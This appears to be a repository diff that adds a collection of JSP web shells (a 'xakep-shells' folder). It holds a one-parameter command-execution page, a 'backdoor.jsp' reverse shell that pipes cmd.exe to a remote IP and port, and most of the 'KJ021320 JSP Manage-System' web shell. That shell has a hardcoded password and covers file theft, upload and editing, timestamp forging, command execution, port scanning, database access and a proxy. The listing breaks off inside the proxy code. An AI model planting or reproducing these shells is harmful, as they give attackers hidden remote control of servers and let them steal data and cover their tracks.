<a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">删除</a><br>
|
||||
<% }
|
||||
}//for
|
||||
} catch (Exception e) {
|
||||
System.out.println("不存在或没有权限");
|
||||
}
|
||||
%>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<p align="center">Power By 绝对零度[B.C.T] QQ:48124012</p>
|
||||
<p align="center"> </p>
|
||||
<%}//if edit
|
||||
}
|
||||
}
|
||||
%>
|
||||
</body>
|
||||
</html>
|
32
xakep-shells/JSP/cmdjsp.jsp.txt
Normal file
32
xakep-shells/JSP/cmdjsp.jsp.txt
Normal file
|
@ -0,0 +1,32 @@
|
|||
// note that linux = cmd and windows = "cmd.exe /c + cmd"
|
||||
|
||||
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
|
||||
<INPUT name='cmd' type=text>
|
||||
<INPUT type=submit value='Run'>
|
||||
</FORM>
|
||||
|
||||
<%@ page import="java.io.*" %>
|
||||
<%
|
||||
String cmd = request.getParameter("cmd");
|
||||
String output = "";
|
||||
|
||||
if(cmd != null) {
|
||||
String s = null;
|
||||
try {
|
||||
Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
|
||||
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
|
||||
while((s = sI.readLine()) != null) {
|
||||
output += s;
|
||||
}
|
||||
}
|
||||
catch(IOException e) {
|
||||
e.printStackTrace();
|
||||
}
|
||||
}
|
||||
%>
|
||||
|
||||
<pre>
|
||||
<%=output %>
|
||||
</pre>
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
91
xakep-shells/JSP/jsp-reverse.jsp.txt
Normal file
91
xakep-shells/JSP/jsp-reverse.jsp.txt
Normal file
|
@ -0,0 +1,91 @@
|
|||
// backdoor.jsp
|
||||
// http://www.security.org.sg/code/jspreverse.html
|
||||
|
||||
<%@
|
||||
page import="java.lang.*, java.util.*, java.io.*, java.net.*"
|
||||
% >
|
||||
<%!
|
||||
static class StreamConnector extends Thread
|
||||
{
|
||||
InputStream is;
|
||||
OutputStream os;
|
||||
|
||||
StreamConnector(InputStream is, OutputStream os)
|
||||
{
|
||||
this.is = is;
|
||||
this.os = os;
|
||||
}
|
||||
|
||||
public void run()
|
||||
{
|
||||
BufferedReader isr = null;
|
||||
BufferedWriter osw = null;
|
||||
|
||||
try
|
||||
{
|
||||
isr = new BufferedReader(new InputStreamReader(is));
|
||||
osw = new BufferedWriter(new OutputStreamWriter(os));
|
||||
|
||||
char buffer[] = new char[8192];
|
||||
int lenRead;
|
||||
|
||||
while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
|
||||
{
|
||||
osw.write(buffer, 0, lenRead);
|
||||
osw.flush();
|
||||
}
|
||||
}
|
||||
catch (Exception ioe)
|
||||
|
||||
try
|
||||
{
|
||||
if(isr != null) isr.close();
|
||||
if(osw != null) osw.close();
|
||||
}
|
||||
catch (Exception ioe)
|
||||
}
|
||||
}
|
||||
%>
|
||||
|
||||
<h1>JSP Backdoor Reverse Shell</h1>
|
||||
|
||||
<form method="post">
|
||||
IP Address
|
||||
<input type="text" name="ipaddress" size=30>
|
||||
Port
|
||||
<input type="text" name="port" size=10>
|
||||
<input type="submit" name="Connect" value="Connect">
|
||||
</form>
|
||||
<p>
|
||||
<hr>
|
||||
|
||||
<%
|
||||
String ipAddress = request.getParameter("ipaddress");
|
||||
String ipPort = request.getParameter("port");
|
||||
|
||||
if(ipAddress != null && ipPort != null)
|
||||
{
|
||||
Socket sock = null;
|
||||
try
|
||||
{
|
||||
sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
|
||||
|
||||
Runtime rt = Runtime.getRuntime();
|
||||
Process proc = rt.exec("cmd.exe");
|
||||
|
||||
StreamConnector outputConnector =
|
||||
new StreamConnector(proc.getInputStream(),
|
||||
sock.getOutputStream());
|
||||
|
||||
StreamConnector inputConnector =
|
||||
new StreamConnector(sock.getInputStream(),
|
||||
proc.getOutputStream());
|
||||
|
||||
outputConnector.start();
|
||||
inputConnector.start();
|
||||
}
|
||||
catch(Exception e)
|
||||
}
|
||||
%>
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
862
xakep-shells/JSP/jspshall.jsp.txt
Normal file
862
xakep-shells/JSP/jspshall.jsp.txt
Normal file
|
@ -0,0 +1,862 @@
|
|||
<%@page import="java.util.*,java.io.*,java.sql.*,java.util.zip.*,java.lang.reflect.*,java.net.*,javax.servlet.jsp.*"%>
|
||||
<%@page contentType="text/html;charset=GBK"%>
|
||||
<%@page pageEncoding="gb2312"%>
|
||||
<%!
|
||||
final String APP_NAME="KJ021320 JSP Manage-System 1.0";
|
||||
int portListen=5000;//set the httpproxy port
|
||||
boolean openHttpProxy=false;//set the httpproxy load-on-start-up
|
||||
%>
|
||||
<%
|
||||
session.setMaxInactiveInterval(6000);
|
||||
final String WEB_SITE=folderReplace(application.getRealPath("/"));
|
||||
final String URL=request.getRequestURI();
|
||||
if(session.getAttribute("ID")==null){
|
||||
// the user and pass field
|
||||
String username="kj021320";
|
||||
String password="kj021320";
|
||||
// the user and pass field
|
||||
if(request.getParameter("LName")!=null&&request.getParameter("LPass")!=null&&request.getParameter("LName").equals(username)&&request.getParameter("LPass").equals(password)){
|
||||
session.setAttribute("ID","1");
|
||||
response.sendRedirect(URL);
|
||||
}else{
|
||||
out.println("<center style=font-size:12px><br><br>"+APP_NAME+"<br><br>" +
|
||||
"<form name=login method=post>username:<input name=LName type=text size=15><br>" +
|
||||
"password:<input name=LPass type=password size=15><br><input type=submit value=Login></form></center>");
|
||||
}
|
||||
return;
|
||||
}
|
||||
%>
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv=Content-Type content="text/html; charset=gb2312">
|
||||
<title><%=APP_NAME%></title>
|
||||
<style type="text/css">
|
||||
body,td{font-size: 12px;}
|
||||
table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');}
|
||||
input,select{font-size:12px;}
|
||||
body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}
|
||||
td{white-space:nowrap;}
|
||||
a{color:black;text-decoration:none;}
|
||||
</style>
|
||||
<script>
|
||||
Top=top.address;
|
||||
function downFile(file){
|
||||
Top.Filename.value=file;
|
||||
Top.Action.value="D";
|
||||
Top.submit();
|
||||
}
|
||||
function checkUrl(){
|
||||
top.address.Action.value="F";
|
||||
top.address.submit();
|
||||
}
|
||||
function editFile(file){
|
||||
top.address.Action.value="E";
|
||||
top.address.Filename.value=file;
|
||||
top.address.submit();
|
||||
}
|
||||
function delFile(file){
|
||||
top.address.Action.value="R";
|
||||
top.address.Filename.value=file;
|
||||
top.address.submit();
|
||||
}
|
||||
function reName(file){
|
||||
if((Rname=prompt("rename to?",file))!=""&&Rname!=null){
|
||||
Top.Action.value="N";
|
||||
top.address.Filename.value=file+"|"+Rname;
|
||||
Top.submit();
|
||||
}
|
||||
}
|
||||
function copyFile(file){
|
||||
if((Rname=prompt("copy to?",file))!=""&&Rname!=null){
|
||||
Top.Action.value="P";
|
||||
top.address.Filename.value=file+"|"+Rname;
|
||||
Top.submit();
|
||||
}
|
||||
}
|
||||
function setDate(file){
|
||||
document.write("Change date:<br><form method='post' action='?Action=dateChange'>");
|
||||
document.write("filename:<input name='Filename' type='text' size=60 readonly value='"+file+"'><br>");
|
||||
document.write("Year:<select name='year'>");
|
||||
for(i=1970;i<=2050;i++){
|
||||
document.write("<option value="+i+">"+i+"</option>");
|
||||
}
|
||||
document.write("</select>");
|
||||
document.write("Month:<select name='month'>");
|
||||
for(i=1;i<=12;i++){
|
||||
document.write("<option value="+i+">"+i+"</option>");
|
||||
}
|
||||
document.write("</select>");
|
||||
document.write("Day:<select name='day'>");
|
||||
for(i=1;i<=31;i++){
|
||||
document.write("<option value="+i+">"+i+"</option>");
|
||||
}
|
||||
document.write("</select>");
|
||||
document.write("<input name='Action' type='button' onclick='top.address.Action.value=\"d\";this.form.submit();' value='dateChange'>");
|
||||
document.write("<input name='cancel' onclick='history.back();' type='button' value='Cancel'>");
|
||||
}
|
||||
function zipFile(file){
|
||||
if((zipF=prompt("save to ?",file+"/down.zip"))!=""&&zipF!=null){
|
||||
top.address.Action.value="Z";
|
||||
top.address.FolderPath.value=file;
|
||||
top.address.Filename.value=zipF;
|
||||
top.address.submit();
|
||||
}
|
||||
}
|
||||
function setDataBase(f){
|
||||
driverName=new Array();
|
||||
driverName[0]="com.sybase.jdbc2.jdbc.SybDriver";
|
||||
driverName[1]="com.microsoft.jdbc.sqlserver.SQLServerDriver";
|
||||
driverName[2]="com.mysql.jdbc.Driver";
|
||||
driverName[3]="oracle.jdbc.driver.OracleDriver";
|
||||
driverName[4]="com.ibm.db2.jdbc.app.DB2Driver";
|
||||
driverName[5]="org.postgresql.Driver";
|
||||
conUrl=new Array();
|
||||
conUrl[0]="jdbc:jtds:sybase://host:port/database";
|
||||
conUrl[1]="jdbc:microsoft:sqlserver://host:port;DatabaseName=";
|
||||
conUrl[2]="jdbc:mysql://host:port/database";
|
||||
conUrl[3]="jdbc:oracle:thin:@host:port:database";
|
||||
conUrl[4]="jdbc:db2://host:port/database";
|
||||
conUrl[5]="jdbc:postgresql://host:port/database";
|
||||
|
||||
f.driver.value=driverName[f.DB.selectedIndex];
|
||||
f.conUrl.value=conUrl[f.DB.selectedIndex];
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body>
|
||||
<%
|
||||
String Action=request.getParameter("Action");
|
||||
char action=(Action==null?"0":Action).charAt(0);
|
||||
try{
|
||||
switch(action){
|
||||
//each skill
|
||||
case 'M':mainMenu(out,WEB_SITE);break;
|
||||
case 'F':showFiles(out,encodeChange(request.getParameter("FolderPath")));break;
|
||||
case 'S':showSystemInfo(out);break;
|
||||
case 'L':servletInfo(config,out);break;
|
||||
case 'D':downFile(encodeChange(request.getParameter("Filename")),response);return;
|
||||
case 'E':editFile(encodeChange(request.getParameter("Filename")),out);break;
|
||||
case 'R':deleteFile(encodeChange(request.getParameter("Filename")),out);break;
|
||||
case 'K':saveFile(encodeChange(request.getParameter("filename")),request.getParameter("FileContent").getBytes("ISO-8859-1"),out);break;
|
||||
case 'N':renameFile(encodeChange(request.getParameter("Filename")),out);break;
|
||||
case 'P':copyFile(encodeChange(request.getParameter("Filename")),out);break;
|
||||
case 'd':dateChange(encodeChange(request.getParameter("Filename")),request.getParameter("year"),request.getParameter("month"),request.getParameter("day"),out);break;
|
||||
case 'r':execFile(encodeChange(request.getParameter("execFile")),out);break;
|
||||
case 'Z':zip(encodeChange(request.getParameter("Filename")),encodeChange(request.getParameter("FolderPath")),out);break;
|
||||
case 'U':upfile(request,out,encodeChange(request.getParameter("UPaddress")));break;
|
||||
case 'n':newFolder(out,encodeChange(request.getParameter("Filename")));break;
|
||||
case 'A':reflectAPI(out,encodeChange(request.getParameter("Filename")));break;
|
||||
case 'I':scanPort(out,encodeChange(request.getParameter("IPaddress")),Integer.parseInt(request.getParameter("startPort")),Integer.parseInt(request.getParameter("endPort")));break;
|
||||
case 's':ConnectionDBM(out,encodeChange(request.getParameter("driver")),encodeChange(request.getParameter("conUrl")),encodeChange(request.getParameter("user")),encodeChange(request.getParameter("password")),encodeChange(request.getParameter("run")),encodeChange(request.getParameter("sqlcmd")));break;
|
||||
case 'H':switchProxyService(out);break;
|
||||
case 'i':userInterFaces(out);break;
|
||||
case 'T':systemTools(out);break;
|
||||
default:
|
||||
mainForm(WEB_SITE,out);break;
|
||||
}
|
||||
}catch(Exception e){
|
||||
}
|
||||
out.print("</body></html>");
|
||||
out.close();
|
||||
|
||||
%>
|
||||
<%!
|
||||
//the main framwork
|
||||
void mainForm(String web_Site,JspWriter out)throws Exception{
|
||||
out.print("<table width=100% height=100% border=0 bgcolor=menu>");
|
||||
out.print("<tr><td height=30 colspan=2>");
|
||||
out.print("<table width=100% height=25 border=0>");
|
||||
out.print("<form name=address method=post target=FileFrame onSubmit='checkUrl();'>");
|
||||
out.print("<tr><td width=60 align=center>FilePath:</td><td>");
|
||||
out.print("<input name=FolderPath style=width:100% value='"+web_Site+"' onchange='checkUrl();'>");
|
||||
out.print("<input type=hidden name=Action value=F>");
|
||||
out.print("<input type=hidden name=Filename>");
|
||||
out.print("</td><td width=60 align=center><a href='javascript:checkUrl();'>GOtoLink</a>");
|
||||
out.print("</td></tr></form></table></td></tr><tr><td width=148>");
|
||||
out.print("<iframe name=Menu src=?Action=M width=100% height=100% frameborder=2 scrolling=yes></iframe></td>");
|
||||
out.print("<td width=600>");
|
||||
out.print("<iframe name=FileFrame src='?Action=F&FolderPath="+web_Site+"' width=100% height=100% frameborder=1 scrolling=yes></iframe>");
|
||||
out.print("</td></tr></table>");
|
||||
}
|
||||
//menu form to choose
|
||||
void mainMenu(JspWriter out,String web_Site)throws Exception{
|
||||
out.println("<table>");
|
||||
out.println("<tr><td bgcolor=Gray><a href=?Action=M>"+ico(58)+"FileOperation(File.class)</a></td></tr>");
|
||||
out.println("<tr><td bgcolor=menu onclick=top.address.FolderPath.value='"+folderReplace(web_Site)+"'><a href='?Action=F&FolderPath="+web_Site+"' target=FileFrame>"+ico(48)+"WEB Folder</a></td></tr>");
|
||||
out.println("<tr><td bgcolor=menu><a href=?Action=S target=FileFrame>"+ico(53)+"SystemInfo(System.class)</a></td></tr>");
|
||||
out.println("<tr><td bgcolor=menu><a href=?Action=L target=FileFrame>"+ico(53)+"ServletInfo</a></td></tr>");
|
||||
out.println("<tr><td bgcolor=menu><a href=?Action=T target=FileFrame>"+ico(53)+"SystemTools</a></td></tr>");
|
||||
out.println("<tr><td bgcolor=menu><a href=?Action=i target=FileFrame>"+ico(57)+"Interfaces</a></td></tr>");
|
||||
out.println("<tr><td bgcolor=menu><a href='http://blog.csdn.net/kj021320' target=FileFrame>About nonamed(kj021320)</a></td></tr>");
|
||||
out.println("</table>");
|
||||
}
|
||||
//show all files and folders
|
||||
void showFiles(JspWriter out,String path)throws Exception{
|
||||
File file=new File(path);
|
||||
long maxSize=0;
|
||||
if(file.isDirectory()&&file.exists()){
|
||||
File[] f=file.listFiles();
|
||||
out.println("<table><tr bgcolor=menu><td>name</td><td>type</td><td>size</td><td>modify date</td><td>readonly</td><td>can write</td><td>hidden</td><td>Action</td></tr>");
|
||||
for(int i=0;i<f.length;i++){
|
||||
maxSize=maxSize+f[i].length();
|
||||
if(f[i].isDirectory())
|
||||
out.println("<tr bgcolor=menu><td><a href=\"javascript:top.address.FolderPath.value='"+folderReplace(f[i].getAbsolutePath())+"/';checkUrl();\">"+ico(48)+f[i].getName()+"</a></td><td> DIR </td><td>"+getSize(f[i].length())+"</td><td>"+new java.util.Date(f[i].lastModified())+"</td><td>"+f[i].canRead()+"</td><td>"+f[i].canWrite()+"</td><td>"+f[i].isHidden()+"</td><td>"+fOperation(true,f[i].getAbsolutePath())+"</td></tr>");
|
||||
else
|
||||
out.println("<tr><td>"+ico(50)+f[i].getName()+"</td><td> file </td><td>"+getSize(f[i].length())+"</td><td>"+new java.util.Date(f[i].lastModified())+"</td><td>"+f[i].canRead()+"</td><td>"+f[i].canWrite()+"</td><td>"+f[i].isHidden()+"</td><td>"+fOperation(false,f[i].getAbsolutePath())+"</td></tr>");
|
||||
}
|
||||
out.println("</table>");
|
||||
out.print("this folder size:"+getSize(maxSize));
|
||||
}
|
||||
}
|
||||
//show the system information
|
||||
void showSystemInfo(JspWriter out)throws Exception{
|
||||
Map map=null;
|
||||
Set set=null;
|
||||
Iterator it=null;
|
||||
|
||||
/*use for jdk1.5
|
||||
map=System.getenv();
|
||||
set=map.keySet();
|
||||
it=set.iterator();
|
||||
out.print("<hr>System Env info:<ul>");
|
||||
while(it.hasNext()){
|
||||
Object oName=it.next();
|
||||
out.println("<li>"+oName+" [ "+map.get(oName)+" ]");
|
||||
}
|
||||
out.print("</ul>");
|
||||
*/
|
||||
|
||||
map=System.getProperties();
|
||||
set=map.keySet();
|
||||
it=set.iterator();
|
||||
out.println("<hr>System Property info:<ul>");
|
||||
while(it.hasNext()){
|
||||
Object oName=it.next();
|
||||
out.println("<li>"+oName+" [ "+map.get(oName)+" ]");
|
||||
}
|
||||
out.print("</ul><hr>System CPU :");
|
||||
out.print(Runtime.getRuntime().availableProcessors()+" <br>");
|
||||
out.print("the JVM Free Memory :"+getSize(Runtime.getRuntime().freeMemory()));
|
||||
out.print("<br>the JVM Max Memory :"+getSize(Runtime.getRuntime().maxMemory()));
|
||||
}
|
||||
//show servlet information
|
||||
void servletInfo(ServletConfig config,JspWriter out)throws Exception{
|
||||
ServletContext sc=config.getServletContext();
|
||||
out.println("Server info: "+sc.getServerInfo()+"<br>");
|
||||
out.println("ServletContext name: "+sc.getServletContextName()+"<br>");
|
||||
out.println("Major version :"+sc.getMajorVersion()+"<br>");
|
||||
out.println("Minor version :"+sc.getMinorVersion()+"<br>");
|
||||
Enumeration en=sc.getInitParameterNames();
|
||||
String initInfo="init parameter: <br>";
|
||||
out.print(initInfo);
|
||||
while(en.hasMoreElements()){
|
||||
String name=(String)en.nextElement();
|
||||
initInfo="key:"+name+" value:"+sc.getInitParameter(name) +"<br>";
|
||||
out.print(initInfo);
|
||||
}
|
||||
|
||||
}
|
||||
//down the server file
|
||||
void downFile(String filename,HttpServletResponse res)throws Exception{
|
||||
int w=0;
|
||||
byte[] buffer=new byte[256];
|
||||
byte[] b=(new File(filename)).getName().getBytes("gb2312");
|
||||
String outFile=new String(b,"ISO-8859-1");
|
||||
res.reset();
|
||||
res.setHeader("Content-disposition","attachment;filename=\""+outFile+"\"");
|
||||
ServletOutputStream sos=res.getOutputStream();
|
||||
BufferedInputStream bis=null;
|
||||
try{
|
||||
bis=new BufferedInputStream(new FileInputStream(filename));
|
||||
while((w=bis.read(buffer,0,buffer.length))!=-1){
|
||||
sos.write(buffer,0,w);
|
||||
}
|
||||
}catch(Exception e){
|
||||
}finally{
|
||||
if(bis!=null)bis.close();
|
||||
}
|
||||
sos.flush();
|
||||
res.flushBuffer();
|
||||
}
|
||||
//delect file
|
||||
void deleteFile(String filename,JspWriter out)throws Exception{
|
||||
File f=new File(filename);
|
||||
if(f.exists()){
|
||||
if(f.delete())out.print(filename+"delete success...");
|
||||
}else{
|
||||
out.print("file not find!!");
|
||||
}
|
||||
}
|
||||
//rename the file
|
||||
void renameFile(String filename,JspWriter out)throws Exception{
|
||||
int split=filename.indexOf("|");
|
||||
String newFilename=filename.substring(split+1);
|
||||
filename=filename.substring(0,split);
|
||||
File f=new File(filename);
|
||||
if(f.exists()){
|
||||
if(f.renameTo(new File(newFilename)))out.print(newFilename+" file move success");
|
||||
}else{
|
||||
out.print("file not find!!");
|
||||
}
|
||||
}
|
||||
//file copy
|
||||
void copyFile(String filename,JspWriter out)throws Exception{
|
||||
int split=filename.indexOf("|");
|
||||
String newFilename=filename.substring(split+1);
|
||||
filename=filename.substring(0,split);
|
||||
File f=new File(filename);
|
||||
BufferedInputStream bis=null;
|
||||
BufferedOutputStream bos=null;
|
||||
if(f.exists()){
|
||||
try{
|
||||
bis=new BufferedInputStream(new FileInputStream(filename));
|
||||
bos=new BufferedOutputStream(new FileOutputStream(newFilename));
|
||||
int s=0;
|
||||
while((s=bis.read())!=-1){
|
||||
bos.write(s);
|
||||
}
|
||||
}catch(Exception e){
|
||||
out.print("file copy error");
|
||||
}finally{
|
||||
if(bis!=null)bis.close();
|
||||
if(bos!=null)bos.close();
|
||||
}
|
||||
out.print(newFilename+"file copy success");
|
||||
}else{
|
||||
out.print("file not find!!");
|
||||
}
|
||||
}
|
||||
//file editor
|
||||
void editFile(String filename,JspWriter out)throws IOException{
|
||||
File f=new File(filename);
|
||||
out.print("<form method=post>File Path:");
|
||||
out.print("<input type=text size=80 name=filename value='"+filename+"'>");
|
||||
out.print("<input type=button name=kFile onClick='this.form.action=\"?Action=K\";this.form.submit();' value=KeepFile >");
|
||||
out.print("<input type=button onClick=editFile(this.form.filename.value); value=ReadFile>");
|
||||
out.print("<textarea name=FileContent rows=35 style=width:100%;>");
|
||||
if(f.exists()){
|
||||
try{
|
||||
BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(filename),"Gb2312"));
|
||||
String s="";
|
||||
while((s=br.readLine())!=null){
|
||||
out.println(htmlEntity(s));
|
||||
}
|
||||
}catch(Exception e){
|
||||
out.print("file edit error");
|
||||
}finally{
|
||||
}
|
||||
}
|
||||
out.print("</textarea></form>");
|
||||
}
|
||||
//file save
|
||||
void saveFile(String filename,byte[] fileContent,JspWriter out)throws IOException{
|
||||
if(filename!=null||fileContent!=null){
|
||||
BufferedOutputStream bos=null;
|
||||
try{
|
||||
bos=new BufferedOutputStream(new FileOutputStream(filename));
|
||||
bos.write(fileContent,0,fileContent.length);
|
||||
}finally{
|
||||
if(bos!=null)bos.close();
|
||||
}
|
||||
out.print(filename+"file save success");
|
||||
}else{
|
||||
out.print("Error");
|
||||
}
|
||||
}
|
||||
//chang the file modify date
|
||||
void dateChange(String filename,String year,String month,String day,JspWriter out)throws IOException{
|
||||
File f=new File(filename);
|
||||
if(f.exists()){
|
||||
Calendar calendar=Calendar.getInstance();
|
||||
calendar.set(Integer.parseInt(year),Integer.parseInt(month),Integer.parseInt(day));
|
||||
if(f.setLastModified(calendar.getTimeInMillis()))
|
||||
out.print(filename+"file date change success");
|
||||
else
|
||||
out.print(filename+"file date change error");
|
||||
}else{
|
||||
out.println("file not find!!!");
|
||||
}
|
||||
}
|
||||
//run file
|
||||
void execFile(String file,JspWriter out)throws Exception{
|
||||
int i=0;
|
||||
Runtime rt=Runtime.getRuntime();
|
||||
Process ps=rt.exec(file);
|
||||
InputStreamReader isr = null;
|
||||
char[] bufferC=new char[1024];
|
||||
try{
|
||||
isr=new InputStreamReader(ps.getInputStream(),"GB2312");
|
||||
out.print("<textarea rows=35 style=width:100%;>");
|
||||
while((i=isr.read(bufferC,0,bufferC.length))!=-1){
|
||||
out.print(htmlEntity(new String(bufferC,0,i)));
|
||||
}
|
||||
}catch(Exception e){
|
||||
out.print("run file error");
|
||||
}finally{
|
||||
if(isr!=null)isr.close();
|
||||
}
|
||||
out.print("</textarea>");
|
||||
systemTools(out);
|
||||
}
|
||||
//zip zhe folder
|
||||
void zip(String zipPath, String srcPath,JspWriter out) throws Exception {
|
||||
FileOutputStream output = null;
|
||||
ZipOutputStream zipOutput = null;
|
||||
try{
|
||||
output = new FileOutputStream(zipPath);
|
||||
zipOutput = new ZipOutputStream(output);
|
||||
zipEntry(zipOutput,srcPath,srcPath,zipPath);
|
||||
}catch(Exception e){
|
||||
out.print("file zip error");
|
||||
}finally{
|
||||
if(zipOutput!=null)zipOutput.close();
|
||||
}
|
||||
out.print("zip ok"+zipPath);
|
||||
}
|
||||
//add the zip entry
|
||||
void zipEntry(ZipOutputStream zipOs, String initPath,String filePath,String zipPath) throws Exception {
|
||||
String entryName = filePath;
|
||||
File f = new File(filePath);
|
||||
if (f.isDirectory()){// check is folder
|
||||
String[] files = f.list();
|
||||
for(int i = 0; i < files.length; i++)
|
||||
zipEntry(zipOs, initPath, filePath + File.separator + files[i],zipPath);
|
||||
return;
|
||||
}
|
||||
String chPh = initPath.substring(initPath.lastIndexOf("/") + 1);// ?????
|
||||
int idx=initPath.lastIndexOf(chPh);
|
||||
if (idx != -1) {
|
||||
entryName = filePath.substring(idx);
|
||||
}
|
||||
ZipEntry entry;
|
||||
entry = new ZipEntry(entryName);
|
||||
File ff = new File(filePath);
|
||||
if(ff.getAbsolutePath().equals(zipPath))return;
|
||||
entry.setSize(ff.length());
|
||||
entry.setTime(ff.lastModified());
|
||||
//the CRC efficacy
|
||||
entry.setCrc(0);
|
||||
CRC32 crc = new CRC32();
|
||||
crc.reset();
|
||||
zipOs.putNextEntry(entry);
|
||||
int len = 0;
|
||||
byte[] buffer = new byte[2048];
|
||||
int bufferLen = 2048;
|
||||
FileInputStream input =null;
|
||||
try{
|
||||
input = new FileInputStream(filePath);
|
||||
while ((len = input.read(buffer, 0, bufferLen)) != -1) {
|
||||
zipOs.write(buffer, 0, len);
|
||||
crc.update(buffer, 0, len);
|
||||
}
|
||||
}catch(Exception e){
|
||||
}finally{
|
||||
if(input!=null)input.close();
|
||||
}
|
||||
entry.setCrc(crc.getValue());
|
||||
}
|
||||
//file upload to server
|
||||
void upfile(HttpServletRequest request,JspWriter out,String filename)throws Exception{
|
||||
String boundary = request.getContentType().substring(30);//?????
|
||||
ServletInputStream sis=request.getInputStream();
|
||||
BufferedOutputStream bos=null;
|
||||
byte[] buffer = new byte[256];
|
||||
String line=null;
|
||||
for(int i=0;i<5;i++){
|
||||
line=readLine(buffer,sis);
|
||||
}
|
||||
try{
|
||||
bos=new BufferedOutputStream(new FileOutputStream(filename));
|
||||
//read the filedata
|
||||
while(line!=null&&line.indexOf(boundary)==-1){
|
||||
bos.write(buffer,0,line.getBytes().length);
|
||||
line=readLine(buffer,sis);
|
||||
}
|
||||
out.print("upload success!");
|
||||
}catch(Exception e){
|
||||
out.print("upload error");
|
||||
}finally{
|
||||
if(bos!=null)bos.close();
|
||||
}
|
||||
}
|
||||
String readLine(byte[] lineByte,ServletInputStream servletInputstream){
|
||||
try{
|
||||
int len=0;
|
||||
len=servletInputstream.readLine(lineByte,0,lineByte.length);
|
||||
if(len == -1){
|
||||
return null;
|
||||
}else{
|
||||
return new String(lineByte,0,len);
|
||||
}
|
||||
}catch(Exception _ex){
|
||||
return null;
|
||||
}
|
||||
}
|
||||
//create folder
|
||||
void newFolder(JspWriter out,String foldername)throws Exception{
|
||||
File f=new File(foldername);
|
||||
if(f.mkdirs()){
|
||||
out.print("the folder create success!");
|
||||
}else{
|
||||
out.print("the folder create error");
|
||||
}
|
||||
}
|
||||
//reflect java API classes
|
||||
void reflectAPI(JspWriter out,String className)throws Exception{
|
||||
Class cls=Class.forName(className);
|
||||
String constructor="";
|
||||
String ifString="";
|
||||
Class[] interfaces=cls.getInterfaces();
|
||||
String supperClass=cls.getSuperclass().toString();
|
||||
Constructor[] c=cls.getDeclaredConstructors();
|
||||
Field[] f=cls.getDeclaredFields();
|
||||
Method[] m=cls.getDeclaredMethods();
|
||||
|
||||
for(int i=0;i<interfaces.length;i++){
|
||||
ifString=ifString+interfaces[i].getName()+",";
|
||||
}
|
||||
out.print("<strong>"+Modifier.toString(cls.getModifiers())+"</strong> "+cls+"<br><strong>extends</strong> "+supperClass+" <strong><br>implemets</strong> "+ifString);
|
||||
|
||||
out.print("<br>{<br><EM>Constructor:</EM><br>");
|
||||
for(int i=0;i<c.length;i++)
|
||||
out.print(" "+c[i]+"<br>");
|
||||
out.print("<EM>Field:</EM><br>");
|
||||
for(int i=0;i<f.length;i++)
|
||||
out.print(" "+f[i]+"<br>");
|
||||
out.print("<EM>Function:</EM><br>");
|
||||
for(int i=0;i<m.length;i++)
|
||||
out.print(" "+m[i]+"<br>");
|
||||
out.print("<br>}");
|
||||
}
|
||||
//scan the remote server port
|
||||
void scanPort(JspWriter out,String strAddress,int startPort,int endPort)throws Exception{
|
||||
if(endPort<startPort||startPort<=0||startPort>65535||endPort>65535||endPort<=0){
|
||||
out.print("port setup error");
|
||||
return;
|
||||
}
|
||||
InetAddress ia=InetAddress.getByName(strAddress);
|
||||
for(int p=startPort;p<=endPort;p+=15){
|
||||
(new ScanPort(ia,p,p+14,out)).start();
|
||||
}
|
||||
Thread.sleep((int)(endPort/startPort)*5000);
|
||||
}//scan port class
|
||||
class ScanPort extends Thread{
|
||||
int startPort;
|
||||
int endPort;
|
||||
InetAddress address;
|
||||
javax.servlet.jsp.JspWriter out;
|
||||
public ScanPort(InetAddress address,int startPort,int endPort,JspWriter out){
|
||||
this.address=address;
|
||||
this.startPort=startPort;
|
||||
this.endPort=endPort;
|
||||
this.out=out;
|
||||
}
|
||||
public void run(){
|
||||
Socket s=null;
|
||||
for(int port=startPort;port<=endPort;port++){
|
||||
try{
|
||||
s=new Socket(address,port);
|
||||
out.println("port "+port+" is Open<br>");
|
||||
}
|
||||
catch(IOException e){
|
||||
}finally{
|
||||
try{s.close();}catch(Exception e){}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
public void switchProxyService(JspWriter out)throws Exception{
|
||||
if(openHttpProxy=!openHttpProxy){//open the proxy
|
||||
new RunProxyService(portListen).start();
|
||||
out.print("Proxy running");
|
||||
}else{
|
||||
out.print("Proxy closed");
|
||||
}
|
||||
}
|
||||
//open httpProxy service
|
||||
public class RunProxyService extends Thread{
|
||||
int port;
|
||||
public RunProxyService(int port){
|
||||
this.port=port;
|
||||
}
|
||||
public void run(){
|
||||
try {
|
||||
ServerSocket ss=new ServerSocket(5000);
|
||||
while(true){
|
||||
if(openHttpProxy){
|
||||
new HttpProxy(ss.accept()).start();
|
||||
}else{
|
||||
break;
|
||||
}
|
||||
}
|
||||
ss.close();
|
||||
} catch (IOException e) {
|
||||
}
|
||||
}
|
||||
}
|
||||
//HttpProxy class
|
||||
public class HttpProxy extends Thread{
|
||||
private Socket s;
|
||||
public int timeOut=10000;
|
||||
public HttpProxy(Socket s){
|
||||
this.s=s;
|
||||
}
|
||||
public HttpProxy(Socket s,int timeOut){
|
||||
this.s=s;
|
||||
this.timeOut=timeOut;//set the connection timeout
|
||||
}
|
||||
public void run(){
|
||||
byte[] bit=new byte[1024];
|
||||
int readBit=0;
|
||||
int size=0;
|
||||
String returnAddress=null;//return to the address
|
||||
int returnPort = 0; //return to the port
|
||||
String sendHostName=null;
|
||||
int sendPort=0;
|
||||
Socket sendSocket=null;
|
||||
OutputStream os=null;
|
||||
InputStream is=null;
|
||||
try{
|
||||
int split=0;
|
||||
|
||||
is=s.getInputStream();
|
||||
//get the http head information
|
||||
if((size=is.read(bit, 0, bit.length))==-1)return;
|
||||
|
